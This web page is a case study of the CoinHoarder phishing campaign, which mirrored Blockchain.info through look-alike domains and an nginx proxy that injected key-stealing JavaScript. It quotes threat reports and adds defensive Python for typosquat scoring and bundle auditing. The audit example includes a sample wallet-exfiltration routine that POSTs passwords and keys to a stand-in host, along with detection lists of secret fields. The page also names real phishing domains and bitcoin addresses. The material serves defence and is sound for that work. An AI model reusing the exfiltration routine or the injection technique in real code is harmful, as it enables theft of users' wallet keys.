$50 000 000 USD





"The world’s most popular crypto wallet. Over 80 million wallets created to buy, sell, and earn crypto." "As they say, not your keys, not your crypto. Blockchain.com Private Key Wallets are the most widely-used wallets for self-custody of your crypto. We make it easy for people who are ready to control their private keys to hold them with a Secret Private Key Recovery Phrase." "When it comes to ensuring that your crypto is secure, we think about every last detail so you don’t have to."


"According to a report published Wednesday, February 14th by Cisco’s Talos Intelligence Group, a team of Ukrainian hackers dubbed CoinHoarder has stolen more than $50 million in cryptocurrency from users who were under the impression they were accessing Blockchain.info, one of the most popular providers of virtual currency wallets." "[S]ecurity researchers teamed up with Ukraine’s Cyberpolice unit to uncover a phishing scam that was going on for at least three years."


"In February 2018, a criminal group, dubbed Coinhoarder, managed to amass a total of $50 million in cryptocurrencies since 2015 – including an amount of $2 million that was taken in less than a month during 2017."


"The campaign was based on the simple premise of setting up fake websites mirroring the immensely popular online wallet website, Blockchain.info." "According to coindesk.com, the perpetrators set up fake sites with similar but slightly different domain names to Blockchain.info, like “blockchien.info”, targeting specific geographic areas."


"The hackers then ensured a steady purchase of Google AdWords in order to infiltrate search results of users looking to access Blockchain.info and position their fake websites in a favorable spot." "This meant people Googling terms like “blockchain” or “Bitcoin wallet,” saw links to malicious websites masquerading as legitimate domains for Blockchain.info wallets."


"The poison ads included “spoofed” links with small mistypes like “blokchien.info/wallet” and “block-clain.info,” which sent visitors to pages that mirrored actual websites of the company Blockchain, which runs both the domains Blockchain.info and Blockchain.com."


"Once users accessed the fake site, they would be fed phishing content in their native language, determined according to their geographic region that was revealed through their IP address."


"This campaign targeted specific geographic regions and allowed the attackers to amass millions in revenue through the theft of cryptocurrency from victims. This campaign demonstrates just how lucrative these sorts of malicious attacks can be for cybercriminals. Additionally, the revenue generated by these sorts of attacks can then be reinvested into other cybercriminal operations."


"Cisco identified an attack pattern in which the threat actors behind the operation would establish a "gateway" phishing link that would appear in search results among Google Ads. When searching for crypto-related keywords such as "blockchain" or "bitcoin wallet," the spoofed links would appear at the top of search results. When clicked, the link would redirect to a "lander" page and serve phishing content in the native language of the geographic region of the victim's IP address."


"The domain block-clain[.]info was used as the initial "gateway" victims would first visit. Victims would immediately be redirected to blockchalna[.]info, the landing page where the actual phishing content was hosted. These fraudulent sites are mostly hosted on bulletproof hosting providers based in Europe."
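The look-alike domains named above (blockchien.info, blokchien.info, block-clain.info, blockchalna.info) are all within a few character edits of blockchain.info. The following is an added example, not code from the original page or from Cisco Talos, of how a brand-protection or SOC team can score candidate hostnames against a protected brand label: normalise confusable characters and hyphens away, then compute an optimal-string-alignment (Damerau-Levenshtein) distance to the brand. The allowlist, the distance threshold and the confusable map are assumptions chosen for this demonstration; the hosts in the sample list are the ones named in the reporting quoted on this page.

```python
"""Score hostnames for typosquatting against a brand label.

Added example for this page; the legitimate-host allowlist, the confusable
map and the distance threshold below are assumptions, not Blockchain.com's.
"""

LEGIT_HOSTS = {"blockchain.info", "blockchain.com"}   # assumed allowlist
BRAND_LABEL = "blockchain"

# Strip separators and map digits that are visually swapped for letters.
CONFUSABLES = str.maketrans({"-": "", "_": "", "0": "o", "1": "l", "3": "e", "5": "s"})


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus adjacent transposition."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,        # deletion
                          d[i][j - 1] + 1,        # insertion
                          d[i - 1][j - 1] + cost) # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def registrable_label(host: str) -> str:
    """Second-level label; simplification that assumes a one-label TLD (.info, .com)."""
    parts = host.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def assess_host(host: str, brand: str = BRAND_LABEL,
                legit: set = LEGIT_HOSTS, max_distance: int = 3):
    """Return (verdict, distance) for one hostname.

    verdict is 'legitimate' for allowlisted hosts and their subdomains,
    'lookalike' when the normalised label is within max_distance edits of
    the brand, and 'unrelated' otherwise.
    """
    host = host.lower().rstrip(".")
    if host in legit or any(host.endswith("." + l) for l in legit):
        return "legitimate", 0
    label = registrable_label(host).translate(CONFUSABLES)
    dist = osa_distance(label, brand)
    return ("lookalike" if dist <= max_distance else "unrelated"), dist


def scan(hosts):
    """Assess a batch of hostnames, e.g. from newly-observed-domain or DNS logs."""
    return {h: assess_host(h) for h in hosts}


# Constructed sample: the phishing hosts named in the Talos reporting plus two controls.
SAMPLE_HOSTS = ["blockchain.info", "wallet.blockchain.com", "blockchien.info",
                "blokchien.info", "block-clain.info", "blockchalna.info", "coinbase.com"]

if __name__ == "__main__":
    for host, (verdict, dist) in scan(SAMPLE_HOSTS).items():
        print(f"{host:24s} {verdict:11s} distance={dist}")
```

In practice the candidate list comes from a newly-registered-domain feed or passive DNS; the threshold of 3 is generous for a 10-character label and will need tuning per brand, and the registrable-label helper should be replaced by a public-suffix-list lookup for real ccSLDs.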


"As soon as the user logs into the wallet, or creates a new one, the JavaScript downloaded from the site is replaced by the Nginx on the fake server with the attackers' own version. These functions, when the wallet is initialized, send a POST request to a special address with the data: sharedkey, password, secondPassword, isDoubleEncrypted, pbkdf2_iterations, accounts. "Accounts" contains the xpub and xpriv keys for each wallet. If the wallet data is encrypted with a double password, it decrypts it and sends this information to its server. An interesting fact is that two-factor authentication will not help in this case."


"The nginx server works as a proxy of the original site, with the exception of the JS file "my-wallet", into which the "Lua nginx" module is used to add malicious functions that are executed after authorization and send the user's private key to the server, after which the balance is automatically checked and the transfer is carried out."
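The two passages above describe a reverse proxy that passes every resource through untouched except the wallet bundle, into which exfiltration code is added. The check a defender (or a careful user with a browser devtools export) can run is to compare the bundle actually served by a suspect host against the canonical one, and to inspect only the added lines for network calls, foreign hosts and wallet secret names. The following is an added example, not code from the original page or from Blockchain.info; the two JavaScript bundles are constructed stand-ins, not the real my-wallet code, and the collector hostname is invented.

```python
"""Audit a served wallet bundle against the canonical bundle.

Added example for this page. CANONICAL_JS and TAMPERED_JS are constructed
stand-ins, not Blockchain.info's real my-wallet code; collector.example is
an invented exfiltration host.
"""
import difflib
import hashlib
import re
from dataclasses import dataclass

# Wallet fields the Talos-era reporting says the injected code exfiltrated.
SECRET_FIELDS = ("sharedkey", "password", "secondPassword", "isDoubleEncrypted",
                 "pbkdf2_iterations", "accounts", "xpriv", "xpub")
# Browser APIs that can move data off the page.
NETWORK_APIS = ("fetch(", "XMLHttpRequest", "sendBeacon", "new Image(", ".src =")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


@dataclass
class Finding:
    line: str
    reasons: list


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def extract_hosts(text: str):
    return sorted(set(URL_RE.findall(text)))


def audit_bundle(canonical_js: str, served_js: str, allowed_hosts: set):
    """Return (hash_matches, findings).

    If the served bundle hashes identically to the canonical one there is
    nothing to inspect. Otherwise diff the two and flag each *added* line
    that contacts a host outside allowed_hosts, touches a network API, or
    names a wallet secret field.
    """
    if sha256_hex(canonical_js) == sha256_hex(served_js):
        return True, []
    diff = difflib.unified_diff(canonical_js.splitlines(), served_js.splitlines(),
                                lineterm="", n=0)
    added = [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]
    findings = []
    for line in added:
        reasons = []
        foreign = [h for h in extract_hosts(line) if h not in allowed_hosts]
        if foreign:
            reasons.append("contacts foreign host: " + ", ".join(foreign))
        if any(api in line for api in NETWORK_APIS):
            reasons.append("uses network API")
        secrets = [f for f in SECRET_FIELDS if f in line]
        if secrets:
            reasons.append("references wallet secrets: " + ", ".join(secrets))
        if reasons:
            findings.append(Finding(line.strip(), reasons))
    return False, findings


# Constructed canonical bundle (stand-in, not the real my-wallet.js).
CANONICAL_JS = """\
function initWallet(payload) {
  var wallet = decryptWallet(payload, password, secondPassword);
  renderBalance(wallet.accounts);
  return wallet;
}
"""

# Constructed tampered bundle: the canonical code plus an appended exfil routine.
TAMPERED_JS = CANONICAL_JS + """\
function exfil(wallet) {
  var body = JSON.stringify({sharedkey: wallet.sharedkey, password: password,
    secondPassword: secondPassword, accounts: wallet.accounts});
  fetch("https://collector.example/drop", {method: "POST", body: body});
}
"""

if __name__ == "__main__":
    ok, findings = audit_bundle(CANONICAL_JS, TAMPERED_JS, {"blockchain.info"})
    print("hash matches:", ok)
    for f in findings:
        print("-", f.line, "|", "; ".join(f.reasons))
```

The hash comparison is the strong signal: a pinned digest of the canonical bundle, published out of band by the vendor, is what a user or monitoring job should trust. The line-level heuristics only explain what changed once the hash differs, and an attacker who minifies or obfuscates the injected code will defeat the keyword checks, which is why the keys should never be exposed to page script in the first place.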


"The account 18xaP8AmpRDAUiqiXsELtKQFzicC78BnYh was stolen at 2017-11-11 22:41:12 from a blockchain.info wallet. The 2FA was activated and no seed stored on any pc. Also no backup. The 2FA was with google authenticator on a smartphone. The bitcoin is being split between two accounts: 13wahvu3FP8LK8P51UmEkhBUhyC7mzkrn3 and 1KDFTGoWXceeZxqUk5wHjnViPEkCdJeU1V. If you check the movements of these wallets you can see they are doing the same to many accounts. The blockchain support answered with a copy/paste generic email, but no more help. The police are already informed and let us see if they can do something...this is frustrating. How can this happen?"


“The attackers needed only to continue purchasing Google AdWords to ensure a steady stream of victims,” the Talos team — led by Jeremiah O’Connor and Dave Maynor — said in their report. Cisco, which investigated the “massive phishing campaign” for more than six months in partnership with Ukraine’s Cyberpolice, noted that the Coinhoarder group’s method has since “become increasingly common in the wild, with attackers targeting many different crypto wallets and exchanges.”


"Cisco found that the Coinhoarder scam disproportionately ensnared those from underbanked regions where cryptocurrency has caught on as an alternative means of storing wealth: Residents of African countries such as Nigeria and Ghana made up the majority of those who landed on the malignant websites." "Using data from Umbrella Client Requester Distribution queries to these malicious domains, we can see a significant number of DNS resolution requests coming from countries such as Nigeria, Ghana, Estonia and many more." "According to a report on the issue published on Tripwire on February 15th, 2018, African countries were persistently targeted by the Ukrainian group, which managed to snatch $10 million just in the last four months of 2017."


"According to blockchain.info security experts, this phishing campaign is one of the largest in the company's history. We believe that this group started its activities at the end of 2014, and in 3 years their total income from criminal activities may exceed hundreds of millions of US dollars."

Blockchain.info was one of the most popular online wallets for bitcoin and other cryptocurrencies. Its wallet ran as JavaScript in the user's browser, so the private keys were decrypted and handled locally on the client rather than on the company's servers. A group of phishers from Ukraine set up mirror websites that looked identical, at very similar URLs. The fake sites proxied content directly from blockchain.info, with the only modification being to the wallet JavaScript, into which code was added that extracted the private keys once the user had unlocked the wallet. Because the keys were taken from inside the victim's own authenticated session, two-factor authentication on the login did not protect them. Users would interact with what they thought was the blockchain.info website, only to find that their funds disappeared. While law enforcement appears to have tracked down the criminals responsible, it does not appear that any funds have been recovered.


Private keys need to be stored offline, and should never be handled in a website environment. Blockchain.info could require an email confirmation whenever access is requested from a new IP address, and only grant access if the confirmation link is clicked from the same IP that requested access; a reverse proxy makes its requests from the attacker's server rather than from the victim's network, so the mismatch would be detectable. Keys could be held in a shared multi-signature arrangement between Blockchain.info and the end user, so that a transfer requires the company's co-signature and a stolen user key alone is not enough to move funds.




© 2021 Quadriga Initiative. Your use of this site/service accepts the Terms of Use and Privacy Policy. This site is not associated with Ernst & Young, Miller Thompson, or the Official Committee of Affected Users. Hosted in Canada by HosterBox.